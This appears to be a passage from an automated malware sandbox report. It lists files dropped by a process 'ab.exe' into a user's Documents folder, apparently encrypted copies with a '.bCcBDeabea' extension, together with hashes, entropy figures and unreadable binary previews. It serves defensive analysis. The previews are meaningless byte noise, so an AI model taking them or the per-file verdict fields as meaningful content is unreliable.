Preview:	%UYG.!....az.}o..m6...o }...DY..&............'.4...q.BZPn-(.E%@..4..WR.rR..L...V..5..../g..:....Dh!j1..r'.....D..........^....e55...s.b;!......a.....$.\|.....,L...Gu.@JB.j2~...+.6...... .abt..E...D..n.#...........RAC...8Oi.%M(....f..P..)...Yn.\.R9.~.Gj..v......]...Ed+{.^...j.Y......~ ....=...n..}I.G.kGS........}.W._.0U\|.1.a...W..f.gU..9.#.n.ZC..w.R'....F1..u....~K.q#.D:..G(...c;.),#x........[.ip.......S....C..9....j.0\'........b.N.j..G....0.....h...D...H..d^....A.b.=.<v.{1..U.O3..Pj{u.........Hw.W.`.....Fk.!.7..7.....a.f)b..r...q+Av...c.nJ.M9..n.mF..y.....a..F......9J......\P..Dh X4..}.o..`...,3.K<5jZ..#......... .....q.x..........Q....J...1.dUxj.5Y.(.QYK...U.....S.....{./...]....P!~......?[.U...&7..W...d..V3.&Yo..4./B.v.0..C.=..v.PpF...k....n..=....n~.....Ui......C5./\...Ga.....12.e.........W....Vj.-.Dt. .U]..hI..(.8.D...?ThaJ............s2k.m!zs*z[..>~...,]...2..F.ayr...hG. a\|4..4k...=K...o...(Ujtm=....3$.%.....Uq.+e[..=.Q.j$.7..1..

C:\Users\user\Documents\EFOYFBOLXA.jpg Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.9781551548759015
Encrypted:	false
SSDEEP:	192:EkYONEeDIJcTErEnsgQhgF6K8dSPDFl1WLJkLkudkc8BdvwV+n:EkYONEe2cTpm2EHdSLZWCeRL
MD5:	06654039C5F933CFA2EEC4D750A74DF5
SHA1:	026FF645FAB17FF0CFBD0F372840119E952FAAB2
SHA-256:	B370F2648964D4AFB50C6EFB10068910088AF3811BB6E501B5D5F6248C346120
SHA-512:	8A4FBCA824A6C0931ECE1A1CD4A7963F9681A3FEE2DF36E1F6D25DAFD8354606C18756242B90C25AF40D66AEBD7D387B9FE9A6D9892A0BA81309F71154EB95AC
Malicious:	false
Preview:	....!........ ..y}.K..L.W7X..:...!T..Y!.0...]G......o...F.J.[W@c.....i.n..B...I.W.t<B..a.b_h9.Z..E.7.uN-a9c...\|g...>..].....N...6.oa..87.,...AA..s.....63.k.....#....r6.......w.......n....Le........s.v....5..n......&..[.&.^..Q.................}...{.....+..2`...T..[...dbr...+. .&p.I...."..N.>PCn..1'........F.s.5...Z.........KM,s.Q....\|.4.....c...L..4EG..Z..W..0...w.....2.2._...L+j.._@...b.S.a...5O.>9....z...D...vr.T4...@PYf....c..>...,Gb.1.W.j...nR>..[)................:..{.6.c0..^.......=.....5...=..e.........'!>..$+=........X.jjD.e....Y..&9.u..a.0]..hJ.v.....#.<xu..[...X....b.%....y.....B.]'W...m..C.....-....Uzd....4....n.e+.0....}..%..._...Y.....y....>.S.>...UJ......p...h>w..r....>j].Gm.R.....(......IzB...#..<B.DjG+J..[.n..^....f..,g......-Ss....9/F..?._<.....0..{..,..=...6[.M...}...`...........H.R...%x..1...).v..+A....<.....U......JdYb.\..<..7Tk ./o.D;.......;.5..i...v..7Y}.....'...xk...y...'f.j/..a.F...\|

C:\Users\user\Documents\EFOYFBOLXA.jpg.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.9781551548759015
Encrypted:	false
SSDEEP:	192:EkYONEeDIJcTErEnsgQhgF6K8dSPDFl1WLJkLkudkc8BdvwV+n:EkYONEe2cTpm2EHdSLZWCeRL
MD5:	06654039C5F933CFA2EEC4D750A74DF5
SHA1:	026FF645FAB17FF0CFBD0F372840119E952FAAB2
SHA-256:	B370F2648964D4AFB50C6EFB10068910088AF3811BB6E501B5D5F6248C346120
SHA-512:	8A4FBCA824A6C0931ECE1A1CD4A7963F9681A3FEE2DF36E1F6D25DAFD8354606C18756242B90C25AF40D66AEBD7D387B9FE9A6D9892A0BA81309F71154EB95AC
Malicious:	false
Preview:	....!........ ..y}.K..L.W7X..:...!T..Y!.0...]G......o...F.J.[W@c.....i.n..B...I.W.t<B..a.b_h9.Z..E.7.uN-a9c...\|g...>..].....N...6.oa..87.,...AA..s.....63.k.....#....r6.......w.......n....Le........s.v....5..n......&..[.&.^..Q.................}...{.....+..2`...T..[...dbr...+. .&p.I...."..N.>PCn..1'........F.s.5...Z.........KM,s.Q....\|.4.....c...L..4EG..Z..W..0...w.....2.2._...L+j.._@...b.S.a...5O.>9....z...D...vr.T4...@PYf....c..>...,Gb.1.W.j...nR>..[)................:..{.6.c0..^.......=.....5...=..e.........'!>..$+=........X.jjD.e....Y..&9.u..a.0]..hJ.v.....#.<xu..[...X....b.%....y.....B.]'W...m..C.....-....Uzd....4....n.e+.0....}..%..._...Y.....y....>.S.>...UJ......p...h>w..r....>j].Gm.R.....(......IzB...#..<B.DjG+J..[.n..^....f..,g......-Ss....9/F..?._<.....0..{..,..=...6[.M...}...`...........H.R...%x..1...).v..+A....<.....U......JdYb.\..<..7Tk ./o.D;.......;.5..i...v..7Y}.....'...xk...y...'f.j/..a.F...\|

C:\Users\user\Documents\EFOYFBOLXA.mp3 Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.976427242589434
Encrypted:	false
SSDEEP:	192:nUCyyCchlWapf9fHToARU0wrVoz6gH8y4zCJGrpGm1JIErvfU9V+n:UCJ1hl5FEOsrO6g4zeGT1J1H3
MD5:	20CBF10010208A2F4D0B291E62757E1E
SHA1:	5B7CDD890C01F28F35E77005991B3E7A2C4C83E2
SHA-256:	AED905F09E4E1F08EEB5B3DFBDBCEBCEA064DF7D5F14C97A09DE9C9C3EDF49E1
SHA-512:	9033F01D3DC0D872547249C9E8FA5C6664D24167ACBAFB42E29212DFF06BE0AA6F3C1F907138C907CF6380482B3EA50A5495A0318DDCDC4B17C9325EB60DA372
Malicious:	false
Preview:	.h8.d@...:..V..H7 "..R.@k.....I.X....).g..6.....l...;wF..zV......S......Ru......-7.^....j}d.=C.q.......~.G...1..7.w$5Om.(.r.@....\|.}.I...Qi..t.=.g.....s..h..L,+.H'.8^..f.mJN.>#Gk.....K.MXMy....$..>=.,...&^.....;$b#.s.C.\31..p#.c3.f.jK7.{s...I....dZFpP.6.zn..W'm.....g{!..W..z..f%.....{.>........5..Gd.U?............"../...].......j...s........Coy....U{4:N.M.N......Un.....K....^....\|..Ib....r..%..c..59.]F...A..$.'.$.I.&i.\|.....y...>`.#?...W.Ur......'J...{....V.8.:T..C...v....F..AZ...h..xO.;ju.........>..F>..t.t..7oV.j...p.>fm..o.p.H...X.ms....T..1.?.xN"cy..Fy&u.@..q.pd../..k.....om/Z.h..-...y.A2%54.......&..}.[4)......a.r.w...,.q&V.8!......sX.....>.Bua<.J...f......+.#FOP.%$....mU.F....7..uy..9.....k....sw....y&P.P....>S......K...6{._.x..-ux!1..%..a&.&...G....d0{.z:\|.j9.F.A..\|..C..;./..m-a...E....."fa.\|..s<4Y.....-.r...X.u........ZP..[.M.u'..D..+.Ew..US.ms....o<.b..G.t..?N.Y9.>..G...z....h..}.`. .e.]...}.;*.Z"."yX......>EN..!k...<A.%.

C:\Users\user\Documents\EFOYFBOLXA.mp3.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.976427242589434
Encrypted:	false
SSDEEP:	192:nUCyyCchlWapf9fHToARU0wrVoz6gH8y4zCJGrpGm1JIErvfU9V+n:UCJ1hl5FEOsrO6g4zeGT1J1H3
MD5:	20CBF10010208A2F4D0B291E62757E1E
SHA1:	5B7CDD890C01F28F35E77005991B3E7A2C4C83E2
SHA-256:	AED905F09E4E1F08EEB5B3DFBDBCEBCEA064DF7D5F14C97A09DE9C9C3EDF49E1
SHA-512:	9033F01D3DC0D872547249C9E8FA5C6664D24167ACBAFB42E29212DFF06BE0AA6F3C1F907138C907CF6380482B3EA50A5495A0318DDCDC4B17C9325EB60DA372
Malicious:	false
Preview:	.h8.d@...:..V..H7 "..R.@k.....I.X....).g..6.....l...;wF..zV......S......Ru......-7.^....j}d.=C.q.......~.G...1..7.w$5Om.(.r.@....\|.}.I...Qi..t.=.g.....s..h..L,+.H'.8^..f.mJN.>#Gk.....K.MXMy....$..>=.,...&^.....;$b#.s.C.\31..p#.c3.f.jK7.{s...I....dZFpP.6.zn..W'm.....g{!..W..z..f%.....{.>........5..Gd.U?............"../...].......j...s........Coy....U{4:N.M.N......Un.....K....^....\|..Ib....r..%..c..59.]F...A..$.'.$.I.&i.\|.....y...>`.#?...W.Ur......'J...{....V.8.:T..C...v....F..AZ...h..xO.;ju.........>..F>..t.t..7oV.j...p.>fm..o.p.H...X.ms....T..1.?.xN"cy..Fy&u.@..q.pd../..k.....om/Z.h..-...y.A2%54.......&..}.[4)......a.r.w...,.q&V.8!......sX.....>.Bua<.J...f......+.#FOP.%$....mU.F....7..uy..9.....k....sw....y&P.P....>S......K...6{._.x..-ux!1..%..a&.&...G....d0{.z:\|.j9.F.A..\|..C..;./..m-a...E....."fa.\|..s<4Y.....-.r...X.u........ZP..[.M.u'..D..+.Ew..US.ms....o<.b..G.t..?N.Y9.>..G...z....h..}.`. .e.]...}.;*.Z"."yX......>EN..!k...<A.%.

C:\Users\user\Documents\GAOBCVIQIJ.docx Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	DOS executable (COM, 0x8C-variant)
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.9774485548647185
Encrypted:	false
SSDEEP:	192:DlRAdYaiKM9AyTan0q0pbGddw91P2vl8005mV+n:xHaiKM9LTo0q0pCdmHP2SjV
MD5:	6A8B803018F15DF09E956F0452506416
SHA1:	DBBB7284D7CE111DDBA9BF384A64DBC13E13E1E9
SHA-256:	45369EC2F9CC5C35957892C3BD991CF9C0AA6CC128E46D09AB79EA61765476E6
SHA-512:	98D012E161745993DD2DA6CF40BDE589AB8A8602338991E005CBE72E271AE970F5C5739C22C35F027D4D94167BEAB129DC63E8D389F0E1B67F66997686144239
Malicious:	false
Preview:	...4...GQ......=HLHe.xg...pTMUfL>.#L....Z....[....../...rk.3.m.B%.........K...+Y.[...."....N.....WcL}G.\.F5.?..nR.^..V..h'..#.~\|[.9.D.h.^z.opf.)A.YnN.;-.(.....V.l....c.B..j...fFx...iO..!rM.S.....qa..2@bt.)...,..._...@...3.Us.i...O....^.......N.....8GK.........A...,......dG.GF.N...s..A:'8Hv=...,.e..........S.........mJ.-...<t.4.......p.+<;<...b..\|u-1..+.....Q......b...\|..'.c.owD............&.Nn{^...~a...}`._T..8.Bc.+.)B...Q.\|..Kt.%9.........r..m%.&..X...3.^.H..T.R.r`....z.._...r..>...Id........Q.+..\|.;..r....q.D....A@.`8.Pc<5....D.6.\|6...5.j..!....!1......(..p5..h.. .2+.!.(...........%S[..>.'.2......I...?....;...,.w.O....2..`..qcr.l..jX..f`;.H.~U.<.t....7Y.`.J...{..d...1......g..n..z.bI...Z........~x..8....6.nr...t..8)..\|Z..Q..)`....^I.8U~5....k.....V...{.P....,.^...Z...R..SS..\...[.P}..I......l#.#PAvu..J.'egg.`5...{.:Dj.k.6..I1.(.n....`..4*.i...}...0...aLH.Pi..9N.[9.c.m}....)...4B.....[..b........!k........l...<D.=:...w..)#....3.C

C:\Users\user\Documents\GAOBCVIQIJ.docx.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	DOS executable (COM, 0x8C-variant)
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.9774485548647185
Encrypted:	false
SSDEEP:	192:DlRAdYaiKM9AyTan0q0pbGddw91P2vl8005mV+n:xHaiKM9LTo0q0pCdmHP2SjV
MD5:	6A8B803018F15DF09E956F0452506416
SHA1:	DBBB7284D7CE111DDBA9BF384A64DBC13E13E1E9
SHA-256:	45369EC2F9CC5C35957892C3BD991CF9C0AA6CC128E46D09AB79EA61765476E6
SHA-512:	98D012E161745993DD2DA6CF40BDE589AB8A8602338991E005CBE72E271AE970F5C5739C22C35F027D4D94167BEAB129DC63E8D389F0E1B67F66997686144239
Malicious:	false
Preview:	...4...GQ......=HLHe.xg...pTMUfL>.#L....Z....[....../...rk.3.m.B%.........K...+Y.[...."....N.....WcL}G.\.F5.?..nR.^..V..h'..#.~\|[.9.D.h.^z.opf.)A.YnN.;-.(.....V.l....c.B..j...fFx...iO..!rM.S.....qa..2@bt.)...,..._...@...3.Us.i...O....^.......N.....8GK.........A...,......dG.GF.N...s..A:'8Hv=...,.e..........S.........mJ.-...<t.4.......p.+<;<...b..\|u-1..+.....Q......b...\|..'.c.owD............&.Nn{^...~a...}`._T..8.Bc.+.)B...Q.\|..Kt.%9.........r..m%.&..X...3.^.H..T.R.r`....z.._...r..>...Id........Q.+..\|.;..r....q.D....A@.`8.Pc<5....D.6.\|6...5.j..!....!1......(..p5..h.. .2+.!.(...........%S[..>.'.2......I...?....;...,.w.O....2..`..qcr.l..jX..f`;.H.~U.<.t....7Y.`.J...{..d...1......g..n..z.bI...Z........~x..8....6.nr...t..8)..\|Z..Q..)`....^I.8U~5....k.....V...{.P....,.^...Z...R..SS..\...[.P}..I......l#.#PAvu..J.'egg.`5...{.:Dj.k.6..I1.(.n....`..4*.i...}...0...aLH.Pi..9N.[9.c.m}....)...4B.....[..b........!k........l...<D.=:...w..)#....3.C

C:\Users\user\Documents\GAOBCVIQIJ.pdf Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.976281289227903
Encrypted:	false
SSDEEP:	192:n1onrqTYRauwhprNWHWJW712a6ElZKu/V+n:n1or2NW2AZho
MD5:	A6FC66F9031DAAB2F274CDD29D76E78C
SHA1:	4223A091E1ED2AF160C2A7B29E8CEE79D1050036
SHA-256:	1FEC9CE17438CF44B3EF047512CFDBB73D49A45A70FFFC8DC1F7214C9264F9D1
SHA-512:	A084E42725D3A4DB848BA27EC139977DBE1EF373395D10597178A62C1D9DB31A04E47286AB80FBFAA9BA51B022760103092D0F03801285B21B3F54B3704FB74F
Malicious:	false
Preview:	..h.:....s\|3+...3...Kt.k....T....ldKMs.K...G.-9.}.1\|$.P...F.@..o..].X,.u.k.....3..J8D..~..E.?.....C..1.K..T...^...fDq..../...h...n...a...B..6.LE...>Q.....\|].S\E}..AD.X..J..>-<P..$FM..V`.r6.....o.."=.t..'[.$.P. ?.h..s.O$..7%..=..h...@....9]....~.vU..;.<........`8M2.V#'GS.\..1....8....v!..6..4k..[...xS..]...+{\|...i...HO.GOo....b.D..?..._..w.....;....4.SCq..X.M.R.:..e.{W.UU..x..5..?L5...178_e..........pM...< mP....."....\|9i..3.E?.Siv..Jy#.7.\\...j.X..~.....+....f.....U.....@.k5(T..iM......$..i{.....[.....H..\|y....p...N.5..q!j.3..$j..t..x.7e...?.U*...Cz...R.....Z....?.iw..H....>.]..eI,7Q..f..gH.4.:K.&....ex`..g......6....>1\'.T.Ss+.a..o1...)..5. L2..C.<g...O...kj..r.....)9:.=~!.#\|..\|...AL..I...x..)5...se.. ...6J..f..1{(d].1.4zUW~"S\|. .o9....J..f.........`s.......VK...V....':...3.....HhZ..RI.....t6.o...^.W....%D....?.o...l..U u..NhiS.......BN.-.ds....5.i....,x....kD......../..............i).iQ.E.$....Jy.U....B.~nf..-.G2R.dsU..Y..cF

C:\Users\user\Documents\GAOBCVIQIJ.pdf.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.976281289227903
Encrypted:	false
SSDEEP:	192:n1onrqTYRauwhprNWHWJW712a6ElZKu/V+n:n1or2NW2AZho
MD5:	A6FC66F9031DAAB2F274CDD29D76E78C
SHA1:	4223A091E1ED2AF160C2A7B29E8CEE79D1050036
SHA-256:	1FEC9CE17438CF44B3EF047512CFDBB73D49A45A70FFFC8DC1F7214C9264F9D1
SHA-512:	A084E42725D3A4DB848BA27EC139977DBE1EF373395D10597178A62C1D9DB31A04E47286AB80FBFAA9BA51B022760103092D0F03801285B21B3F54B3704FB74F
Malicious:	false
Preview:	..h.:....s\|3+...3...Kt.k....T....ldKMs.K...G.-9.}.1\|$.P...F.@..o..].X,.u.k.....3..J8D..~..E.?.....C..1.K..T...^...fDq..../...h...n...a...B..6.LE...>Q.....\|].S\E}..AD.X..J..>-<P..$FM..V`.r6.....o.."=.t..'[.$.P. ?.h..s.O$..7%..=..h...@....9]....~.vU..;.<........`8M2.V#'GS.\..1....8....v!..6..4k..[...xS..]...+{\|...i...HO.GOo....b.D..?..._..w.....;....4.SCq..X.M.R.:..e.{W.UU..x..5..?L5...178_e..........pM...< mP....."....\|9i..3.E?.Siv..Jy#.7.\\...j.X..~.....+....f.....U.....@.k5(T..iM......$..i{.....[.....H..\|y....p...N.5..q!j.3..$j..t..x.7e...?.U*...Cz...R.....Z....?.iw..H....>.]..eI,7Q..f..gH.4.:K.&....ex`..g......6....>1\'.T.Ss+.a..o1...)..5. L2..C.<g...O...kj..r.....)9:.=~!.#\|..\|...AL..I...x..)5...se.. ...6J..f..1{(d].1.4zUW~"S\|. .o9....J..f.........`s.......VK...V....':...3.....HhZ..RI.....t6.o...^.W....%D....?.o...l..U u..NhiS.......BN.-.ds....5.i....,x....kD......../..............i).iQ.E.$....Jy.U....B.~nf..-.G2R.dsU..Y..cF

C:\Users\user\Documents\GAOBCVIQIJ\BNAGMGSPLO.jpg Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.978580903469927
Encrypted:	false
SSDEEP:	192:KqIsl3ttRIjiryxEuk2r0SzCzzQy2BzjEFetuV+n:KqI0RIgqEuk2fz+N2Bz4FG7
MD5:	26554AD741CD3BB34D9BE63A4609CB78
SHA1:	8F9C143F1E42E68A3BDED3CF5107DB5ED2C6C861
SHA-256:	E1ED686D36969596D39A9B8E0F6A6B88A46E3A7F56FBCB68C5A46BE8B5E7B9DF
SHA-512:	8AB405CEF2846D5BEC06E0D846AB2EFEEE6C509EEC7E05A4BB7A3679D4FAF7B61693036358608D20C022280CC392133F5038E0C7DC01D0B6AE762024E2175515
Malicious:	false
Preview:	...l...i.....].U...~...O<...hV.....X.'D...7@\|.E...3._....w./...S&>.)._..k.b..]..3..H..R.0=`-..c.Dz.z....W.I;oLB..0..y..l.x<.....2.........\.-.8...N&.......o.t.eT.2.i...xz;;...a.p..jC.P$y:,QMx..HyD.J.}.#...a.mg{....M4...^...}....V.[z.v.6.9..rK...cv4...A.A...ee.9^s.....lfQ......?.^.?.c.W..b..j..k3...W.....%......hqW...K.....z.lm..hF...x..K.q!.a...:...NXm.}R..2D-..^l...^FdU........U...OT..D_py.......... ._,i.0."a~`.~...&=.h....`.x.& ...dduA.p$9 VD..C.Oc:..:z.i.....,..QQ..qIt......K......'.7..H..\...F..;I...1.O...rf..&....._.s..Q..}oTr.w...,...M<.t...Q..U..$DKV....OkJ.q..........L..S..nY....^:'......5......A.<.0....&X.......a.;..8.\|.I5.._..(.Z.P.V..L..m...<3.._.`D.?......F.Z.-q...4.P=....5.#...C._...U...H....n...+*vtbC$......a....5.`.N.%.w,M.'.....t%3rt....t'..<.1..y.9(0TXN6.y.".~.%Ow.X....D.3.E.H.U.~...aC.Q....kw.]..j.*....T.^......$...99J.......kL.....d...c....M..4...z..t1.4/IVR.9.V@.C.$...<t.......E.o(..`.+...........(.!....t...4y

C:\Users\user\Documents\GAOBCVIQIJ\BNAGMGSPLO.jpg.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.978580903469927
Encrypted:	false
SSDEEP:	192:KqIsl3ttRIjiryxEuk2r0SzCzzQy2BzjEFetuV+n:KqI0RIgqEuk2fz+N2Bz4FG7
MD5:	26554AD741CD3BB34D9BE63A4609CB78
SHA1:	8F9C143F1E42E68A3BDED3CF5107DB5ED2C6C861
SHA-256:	E1ED686D36969596D39A9B8E0F6A6B88A46E3A7F56FBCB68C5A46BE8B5E7B9DF
SHA-512:	8AB405CEF2846D5BEC06E0D846AB2EFEEE6C509EEC7E05A4BB7A3679D4FAF7B61693036358608D20C022280CC392133F5038E0C7DC01D0B6AE762024E2175515
Malicious:	false
Preview:	...l...i.....].U...~...O<...hV.....X.'D...7@\|.E...3._....w./...S&>.)._..k.b..]..3..H..R.0=`-..c.Dz.z....W.I;oLB..0..y..l.x<.....2.........\.-.8...N&.......o.t.eT.2.i...xz;;...a.p..jC.P$y:,QMx..HyD.J.}.#...a.mg{....M4...^...}....V.[z.v.6.9..rK...cv4...A.A...ee.9^s.....lfQ......?.^.?.c.W..b..j..k3...W.....%......hqW...K.....z.lm..hF...x..K.q!.a...:...NXm.}R..2D-..^l...^FdU........U...OT..D_py.......... ._,i.0."a~`.~...&=.h....`.x.& ...dduA.p$9 VD..C.Oc:..:z.i.....,..QQ..qIt......K......'.7..H..\...F..;I...1.O...rf..&....._.s..Q..}oTr.w...,...M<.t...Q..U..$DKV....OkJ.q..........L..S..nY....^:'......5......A.<.0....&X.......a.;..8.\|.I5.._..(.Z.P.V..L..m...<3.._.`D.?......F.Z.-q...4.P=....5.#...C._...U...H....n...+*vtbC$......a....5.`.N.%.w,M.'.....t%3rt....t'..<.1..y.9(0TXN6.y.".~.%Ow.X....D.3.E.H.U.~...aC.Q....kw.]..j.*....T.^......$...99J.......kL.....d...c....M..4...z..t1.4/IVR.9.V@.C.$...<t.......E.o(..`.+...........(.!....t...4y

C:\Users\user\Documents\GAOBCVIQIJ\EEGWXUHVUG.png Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.9808293019820775
Encrypted:	false
SSDEEP:	192:XwWsIdBAI2rNNREeye0AnNsWXrrJsbyQtTM5/ooaQtkKx+PHmkTcWdkFyV+n:XwWDARV5IFW7YjtQ2bE49/d0
MD5:	9D389747B493661E916D84F0296B4905
SHA1:	3D288034A6A9BFD7CA252878A8679290FCF48EA6
SHA-256:	5B91DC3C680A0BFB917C05491AE84DB83718D50762CBAE9BADDC72D27AE528B1
SHA-512:	C2DB72E941C53D6FB189A0681DE4E098A1EA4FBA9AEA7FD550D84C47B7260D9AFD8F708B5A426F6ADBF2D9AE3AE58137757A3E09AD803C9903B8E8675ECF5133
Malicious:	false
Preview:	.)>N....6S.&]......I.l.~lE..H..h.V.L.p[.[.@...r....6K.>.w....<.....`..vC+O..........S9.].q`P..<$...Z..$.+.rpa.@.A.@...Z.......%...........G$.a.<...NO.....g.....r......G-i.Z.at`.l.].L.. ..m.T.H.6..eN........@....,..."..F.Qm.a..F.a .....a....5...TX.X.U$L.ay.w..1.heu.:.....U..f`...t._.L..E.D ..T........./z.9_...Y..........=..7.^f<...'./.......(Cj.b..?m ..`c.k.z].Q.....B......e....;...F...@/.u..gv......[P.....1O.7..-...Vr.......[H...........>.~.F.... .$.........O..J.....7.].).H.1):...l07LB...Z..DGbgW}.i{.$B<.~...2G.G..V!.@k#......x`.4......l.d.h.BT.....zt.....)..8..+.')7K.a.......k....v.+`...e..q._C.....p...Ksl..M.jKU<9...4....&... 1.%9.W. P.L..k(Q_.....9.O............g.7.SaA.qn.9m.........?.....H...<.B..4............^5#.H.{3.{.DM......8^6-......!....:.$........H...`F....EN.....3..Zo...u.z.1u/T7....\|m^.....q....d.....BR.[\|b...f!.V..'.W#VL.....'_:{!...e."...L...>.M4[.rE.{.E.{.7..n...I...1.....Lo.N.p).Iw.7.L.....YB%..Oa...[.X...

C:\Users\user\Documents\GAOBCVIQIJ\EEGWXUHVUG.png.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.9808293019820775
Encrypted:	false
SSDEEP:	192:XwWsIdBAI2rNNREeye0AnNsWXrrJsbyQtTM5/ooaQtkKx+PHmkTcWdkFyV+n:XwWDARV5IFW7YjtQ2bE49/d0
MD5:	9D389747B493661E916D84F0296B4905
SHA1:	3D288034A6A9BFD7CA252878A8679290FCF48EA6
SHA-256:	5B91DC3C680A0BFB917C05491AE84DB83718D50762CBAE9BADDC72D27AE528B1
SHA-512:	C2DB72E941C53D6FB189A0681DE4E098A1EA4FBA9AEA7FD550D84C47B7260D9AFD8F708B5A426F6ADBF2D9AE3AE58137757A3E09AD803C9903B8E8675ECF5133
Malicious:	false
Preview:	.)>N....6S.&]......I.l.~lE..H..h.V.L.p[.[.@...r....6K.>.w....<.....`..vC+O..........S9.].q`P..<$...Z..$.+.rpa.@.A.@...Z.......%...........G$.a.<...NO.....g.....r......G-i.Z.at`.l.].L.. ..m.T.H.6..eN........@....,..."..F.Qm.a..F.a .....a....5...TX.X.U$L.ay.w..1.heu.:.....U..f`...t._.L..E.D ..T........./z.9_...Y..........=..7.^f<...'./.......(Cj.b..?m ..`c.k.z].Q.....B......e....;...F...@/.u..gv......[P.....1O.7..-...Vr.......[H...........>.~.F.... .$.........O..J.....7.].).H.1):...l07LB...Z..DGbgW}.i{.$B<.~...2G.G..V!.@k#......x`.4......l.d.h.BT.....zt.....)..8..+.')7K.a.......k....v.+`...e..q._C.....p...Ksl..M.jKU<9...4....&... 1.%9.W. P.L..k(Q_.....9.O............g.7.SaA.qn.9m.........?.....H...<.B..4............^5#.H.{3.{.DM......8^6-......!....:.$........H...`F....EN.....3..Zo...u.z.1u/T7....\|m^.....q....d.....BR.[\|b...f!.V..'.W#VL.....'_:{!...e."...L...>.M4[.rE.{.E.{.7..n...I...1.....Lo.N.p).Iw.7.L.....YB%..Oa...[.X...

C:\Users\user\Documents\GAOBCVIQIJ\EFOYFBOLXA.mp3 Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.97996259530454
Encrypted:	false
SSDEEP:	192:ZvG31SaR6Yni+msLxZ0FzkTQCvkf637vIEah5Dj0a4z2Q6V+n:RkU+msLxuFzkRvkAvIEahS8Q/
MD5:	C39FA9042CAB3AC36D60794A60FE545B
SHA1:	72B34A85DFBFF7C4AEDD8546F2F1AEF2F45C6BD6
SHA-256:	8A660691D65DB7B1D25337F659D8F23996FF2CC0593CD97AE93E43A79394A151
SHA-512:	23360DFBD57C048342C61B87AAD7990420C6209C1BF66A903707E6D64CA889BD9B69110F265373EAA4FC26665B1F82B90958C4B6D19BC3389F80636CEB70C515
Malicious:	false
Preview:	..(4.....Su..C.0.&..0.'..t..s.. p]L..s..<.mK...f5..&;.f......1k.!.....'.r;..y..X#...@.1......D..N..zR..F..#. .J(...L}...J......0.$#e5..Fx.\|q...;H..b.^Y......s#....X..V.....N.e..J...../9w1....INLH....f... "...R..8..L......V..h.b./.b.kC9..v@....j.......m.......a#p.L.........U.b$...D...{...;..AJ..2......%.L.K..r....^.lh...5.........Vz.Y..VIL.$:.8c...........@^Z\|=.1T........s<....dQ.[N.LMPv......&. 8m..3;i..\|......./R.k+...g.j.L..H....'...Z.Y3.:.86..Z?L.'..H.YS.....1..5>B.P....2.H....{..U`<.,.... .#.&...#..E.%....iAw.}n%T\|.j .d.9..3...Y.v3.\......(.s..........#.Ut.s.G*E....b...;.Jh....r3.......=Ar..}.G..K.Y..4S...M.J6P..O].....V.#B{..n..k.Q....,....,C..5.....s.+.ng...}..SM1b...]!.^.p.nc...l..l......$.C...A."{oSn-..8....am.^.......=\|V.T3G..j....v+.-.../..'........'....RJ..a.W.=#........w.i5H..^....L....$...H...:....M.x.=.(......l...Y...Wu....n.&Ai..W.....NL....-.8M.L....T..\|.....M.~...am......$j.U..JUX..@AX.O......C.`

C:\Users\user\Documents\GAOBCVIQIJ\EFOYFBOLXA.mp3.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.97996259530454
Encrypted:	false
SSDEEP:	192:ZvG31SaR6Yni+msLxZ0FzkTQCvkf637vIEah5Dj0a4z2Q6V+n:RkU+msLxuFzkRvkAvIEahS8Q/
MD5:	C39FA9042CAB3AC36D60794A60FE545B
SHA1:	72B34A85DFBFF7C4AEDD8546F2F1AEF2F45C6BD6
SHA-256:	8A660691D65DB7B1D25337F659D8F23996FF2CC0593CD97AE93E43A79394A151
SHA-512:	23360DFBD57C048342C61B87AAD7990420C6209C1BF66A903707E6D64CA889BD9B69110F265373EAA4FC26665B1F82B90958C4B6D19BC3389F80636CEB70C515
Malicious:	false
Preview:	..(4.....Su..C.0.&..0.'..t..s.. p]L..s..<.mK...f5..&;.f......1k.!.....'.r;..y..X#...@.1......D..N..zR..F..#. .J(...L}...J......0.$#e5..Fx.\|q...;H..b.^Y......s#....X..V.....N.e..J...../9w1....INLH....f... "...R..8..L......V..h.b./.b.kC9..v@....j.......m.......a#p.L.........U.b$...D...{...;..AJ..2......%.L.K..r....^.lh...5.........Vz.Y..VIL.$:.8c...........@^Z\|=.1T........s<....dQ.[N.LMPv......&. 8m..3;i..\|......./R.k+...g.j.L..H....'...Z.Y3.:.86..Z?L.'..H.YS.....1..5>B.P....2.H....{..U`<.,.... .#.&...#..E.%....iAw.}n%T\|.j 